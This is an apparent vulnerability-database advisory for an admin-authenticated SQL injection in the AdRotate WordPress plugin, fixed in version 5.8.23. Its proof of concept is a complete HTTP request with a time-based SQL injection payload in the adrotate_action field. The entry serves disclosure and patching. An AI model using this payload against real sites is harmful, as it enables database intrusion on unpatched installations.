WordPress Plugin Vulnerabilities
AdRotate < 5.8.22 - Admin+ SQL Injection
Description
The plugin does not sanitise and escape the adrotate_action before using it in a SQL statement via the adrotate_request_action function available to admins, leading to a SQL injection
Proof of Concept
Get the nonce from one of the bulk action, for example /wp-admin/admin.php?page=adrotate and look for adrotate_nonce in the source POST /wp-admin/ HTTP/1.1 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 107 Connection: close Cookie: [admin+] adrotate_action_submit=1&adrotate_nonce=07d896329d&adrotate_action=renew-1 where sleep(10)#&bannercheck[]=1
Affects Plugins
Fixed in version 5.8.23
References
Classification
Miscellaneous
Original Researcher
JrXnm
Submitter
JrXnm
Submitter website
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2022-02-07 (about 5 months ago)
Added
2022-02-07 (about 5 months ago)
Last Updated
2022-04-13 (about 2 months ago)